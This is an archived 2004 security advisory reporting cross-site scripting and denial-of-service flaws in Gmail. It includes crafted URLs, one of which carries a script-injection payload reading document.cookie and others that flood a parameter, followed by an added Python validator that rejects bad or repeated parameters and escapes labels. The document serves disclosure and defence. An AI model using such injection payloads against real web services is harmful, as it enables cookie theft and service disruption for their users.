lostmonGmail.txt

Date: 11 Dec 2004 | Reported by: Lostmon | Type: packetstorm | Source: packetstormsecurity.com

Advisory describing Denial of Service and Cross Site Scripting vulnerabilities in Gmail, with exploit details.

Code
`Date: Sat, 20 Nov 2004 03:37:04 +0100  
From: Lostmon <[email protected]>  
Subject: multiple vulnerabilities in gmail service (XSS, Denial of Service)  
  
  
  
#######################################  
Denial of service On gmail account  
vendor url: http://gmail.google.com/  
vendor notified: yes exploit included: yes  
original advisory: http://lostmon.spymac.net/blog/  
########################################  
  
When a user has the Gmail cookie active, a user can create a special URL to  
the Gmail service. It has these two vulnerabilities:  
  
1- can change the name of the "remove label" button and can create a ghost category.  
  
http://gmail.google.com/gmail?search=cat&cat=[label_name]&view=tl&start=0&zx=18acabd2  
b173f0d81040559556&fs=1  
  
2. the xz variable does not properly validate the input and can permit execution of XSS code  
  
  
http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f  
0d81040559556[XSS-code]&fs=1  
  
3. Denial of service: there is no count of how many times the fs variable is in the URL and ,,,,  
  
http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f  
0d81040559556&fs=%3Cscript%3Ealert(  
document.cookie)%3C%2Fscript%3E&fs=1  
  
or   
  
http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f  
0d81040559556&fs=%3Cscript%3Ealert(  
document.cookie)%3C%2Fscript%3E&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs  
=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&  
fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1  
  
nice :)  
  
Sincerely:  
  
Lostmon  
  
  
Thanks to http://www.ayuda-internet.net for their support  
Thanks to Rottew and ismax  
Thanks to estrella for being my light  
  
Curiosity is what makes the mind move....  
  
  
`
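
A server-side check for the input-handling problems the advisory describes (markup accepted in a query parameter, and one parameter repeated many times), as an added example that is not part of the advisory or of Gmail's code. The value formats, the `mail.example` host, `MAX_PAIRS` and the function names are assumptions inferred only from the shape of the sample URLs.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed value formats, inferred only from the sample URLs in the advisory.
RULES = {
    "search": re.compile(r"[a-z]{1,16}"),
    "cat": re.compile(r"[^\x00-\x1f]{1,64}"),  # free text: escaped on output
    "view": re.compile(r"[a-z]{1,8}"),
    "start": re.compile(r"[0-9]{1,6}"),
    "zx": re.compile(r"[0-9a-f]{1,64}"),       # hex token only
    "fs": re.compile(r"[01]"),
}
MAX_PAIRS = 16  # hypothetical cap on name=value pairs per request


def check_query(url):
    """Return (ok, reason, params); reject rather than pick one of several values."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if len(pairs) > MAX_PAIRS:
        return False, "too many parameters", {}
    params = {}
    for name, value in pairs:
        if name not in RULES:
            return False, f"unknown parameter {name!r}", {}
        if name in params:
            return False, f"duplicate parameter {name!r}", {}
        if not RULES[name].fullmatch(value):
            return False, f"bad value for {name!r}", {}
        params[name] = value
    return True, "ok", params


def render_label(params):
    """HTML-escape the label before it is written into button or heading text."""
    return html.escape(params.get("cat", ""), quote=True)


# Constructed sample requests modelled on the advisory's URL shapes.
BASE = "http://mail.example/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f0d81040559556"
SAMPLES = {
    "normal": BASE + "&fs=1",
    "markup_in_zx": BASE + "%3Cb%3Ex%3C%2Fb%3E&fs=1",
    "fs_twice": BASE + "&fs=1&fs=1",
    "fs_flood": BASE + "&fs=1" * 30,
    "markup_label": BASE.replace("cat=etiketa", "cat=%3Cb%3Ex%3C%2Fb%3E") + "&fs=1",
}

if __name__ == "__main__":
    for name, url in SAMPLES.items():
        ok, reason, params = check_query(url)
        print(f"{name:13} ok={ok} reason={reason} label={render_label(params)!r}")
```

The label is accepted as free text and escaped at render time, while the token and flag parameters are rejected outright when they do not match their expected format or appear more than once.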
